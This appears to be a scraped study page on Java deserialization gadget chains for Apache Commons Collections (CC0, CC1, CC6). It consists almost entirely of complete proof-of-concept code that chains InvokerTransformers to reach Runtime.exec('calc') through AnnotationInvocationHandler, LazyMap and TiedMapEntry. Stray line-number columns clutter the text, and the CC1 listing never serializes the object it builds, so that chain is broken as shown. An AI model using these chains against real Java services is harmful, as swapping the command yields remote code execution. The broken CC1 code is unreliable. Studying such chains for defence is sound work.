[toc]
CC0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
public static void main(String[] args) throws Exception
{
Class<?> clazz = Class.forName("java.lang.Runtime");
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(clazz),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> hm=new HashMap<>();
hm.put("value","b");
Map<Object,Object> tmap = TransformedMap.decorate(hm,null,chainedTransformer);
Class<?> anoclazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor<?> constructor=anoclazz.getDeclaredConstructor(Class.class,Map.class);
constructor.setAccessible(true);
Object aih=constructor.newInstance(Target.class,tmap);
serilize(aih);
unserilize("ser.bin");
}
|
CC1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
|
public class CC1
{
public static void main(String[] args) throws Exception
{
Class<?> clazz = Class.forName("java.lang.Runtime");
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(clazz),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> hm = new HashMap<>();
Map<Object, Object> lm=LazyMap.decorate(hm,chainedTransformer);
Class<?> anoclazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor<?> constructor = anoclazz.getDeclaredConstructor(Class.class, Map.class);
constructor.setAccessible(true);
InvocationHandler aih = (InvocationHandler) constructor.newInstance(Override.class, lm);
Map mapproxy= (Map) Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class},aih);
Object o =constructor.newInstance(Override.class,mapproxy);
unserilize("ser.bin");
}
}
|
CC6
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
public class CC6
{
public static void main(String[] args) throws Exception
{
Class<?> clazz = Class.forName("java.lang.Runtime");
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(clazz),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> hm = new HashMap<>();
Map<Object, Object> lm= LazyMap.decorate(hm,new ConstantTransformer(1));
TiedMapEntry tiedMapEntry=new TiedMapEntry(lm,"kkk");
HashMap<Object, Object> hashMap = new HashMap<>();
hashMap.put(tiedMapEntry,"1111");
lm.remove("kkk");
Class c = LazyMap.class;
Field factoryField = c.getDeclaredField("factory");factoryField.setAccessible(true);
factoryField.set(lm, chainedTransformer);
serilize(hashMap);
unserilize("ser.bin");
}
}
|
sink替换(不用的命令执行方式)
同类型替换
二次反序列化
Reference
EkiXu/marshalexp (github.com)
白日梦组长的个人空间_哔哩哔哩_bilibili
